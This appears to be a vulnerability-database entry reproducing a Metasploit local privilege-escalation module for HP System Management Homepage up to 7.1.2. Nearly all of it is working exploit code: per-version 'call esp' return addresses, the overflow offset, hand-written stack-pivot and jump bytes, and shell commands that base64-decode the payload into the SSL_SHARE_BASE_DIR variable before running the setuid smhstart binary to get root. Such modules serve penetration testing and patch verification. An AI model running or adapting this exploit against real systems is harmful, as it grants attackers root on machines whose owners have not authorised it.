HP System Management Homepage Local Privilege Escalation

🗓️ 01 Jul 2014 00:00:00Reported by RootType

HP System Management Homepage Local Privilege Escalation vulnerability in HP System Management Homepage <= 7.1.2, with a local buffer overflow in SSL_SHARE_BASE_DIR env variable


                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require &#39;msf/core&#39;
require &#39;rex&#39;
require &#39;msf/core/post/common&#39;
require &#39;msf/core/exploit/local/linux&#39;
require &#39;msf/core/exploit/exe&#39;

class Metasploit4 &#60; Msf::Exploit::Local

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common

  include Msf::Exploit::Local::Linux

  def initialize(info={})
    super( update_info( info, {
        &#39;Name&#39;          =&#62; &#39;HP System Management Homepage Local Privilege Escalation&#39;,
        &#39;Description&#39;   =&#62; %q{
            Versions of HP System Management Homepage &#60;= 7.1.2 include a setuid root
          smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
          env variable.
        },
        &#39;License&#39;       =&#62; MSF_LICENSE,
        &#39;Author&#39;        =&#62;
          [
            &#39;agix&#39; # @agixid # Vulnerability discovery and Metasploit module
          ],
        &#39;Platform&#39;      =&#62; [ &#39;linux&#39; ],
        &#39;Arch&#39;          =&#62; [ ARCH_X86 ],
        &#39;SessionTypes&#39;  =&#62; [ &#39;shell&#39; ],
        &#39;Payload&#39;    =&#62;
          {
            &#39;Space&#39;     =&#62; 227,
            &#39;BadChars&#39;   =&#62; &#34;\x00\x22&#34;
          },
        &#39;References&#39;    =&#62;
          [
            [&#39;OSVDB&#39;, &#39;91990&#39;]
          ],
        &#39;Targets&#39;       =&#62;
          [
            [ &#39;HP System Management Homepage 7.1.1&#39;,
              {
                &#39;Arch&#39; =&#62; ARCH_X86,
                &#39;CallEsp&#39; =&#62; 0x080c86eb, # call esp
                &#39;Offset&#39; =&#62; 58
              }
            ],
            [ &#39;HP System Management Homepage 7.1.2&#39;,
              {
                &#39;Arch&#39; =&#62; ARCH_X86,
                &#39;CallEsp&#39; =&#62; 0x080c8b9b, # call esp
                &#39;Offset&#39; =&#62; 58
              }
            ],
          ],
        &#39;DefaultOptions&#39; =&#62;
          {
            &#39;PrependSetuid&#39;    =&#62; true
          },
        &#39;DefaultTarget&#39; =&#62; 0,
        &#39;DisclosureDate&#39; =&#62; &#34;Mar 30 2013&#34;,
      }
      ))
    register_options([
        OptString.new(&#34;smhstartDir&#34;, [ true, &#34;smhstart directory&#34;, &#34;/opt/hp/hpsmh/sbin/&#34; ])
      ], self.class)
  end

  def exploit
    pl = payload.encoded
    padding = rand_text_alpha(target[&#39;Offset&#39;])
    ret = [target[&#39;CallEsp&#39;]].pack(&#39;V&#39;)
    exploit =  pl
    exploit &#60;&#60; ret
    exploit &#60;&#60; &#34;\x81\xc4\x11\xff\xff\xff&#34;   # add esp, 0xffffff11
    exploit &#60;&#60; &#34;\xe9\x0e\xff\xff\xff&#34;    # jmp =&#62; begining of pl
    exploit &#60;&#60; padding
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
    id=cmd_exec(&#34;id -un&#34;)
    if id!=&#34;hpsmh&#34;
      fail_with(Exploit::Failure::NoAccess, &#34;You are #{id}, you must be hpsmh to exploit this&#34;)
    end
    cmd_exec(&#34;export SSL_SHARE_BASE_DIR=$(echo -n &#39;#{exploit_encoded}&#39; | base64 -d)&#34;)
    cmd_exec(&#34;#{datastore[&#39;smhstartDir&#39;]}/smhstart&#34;)
  end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1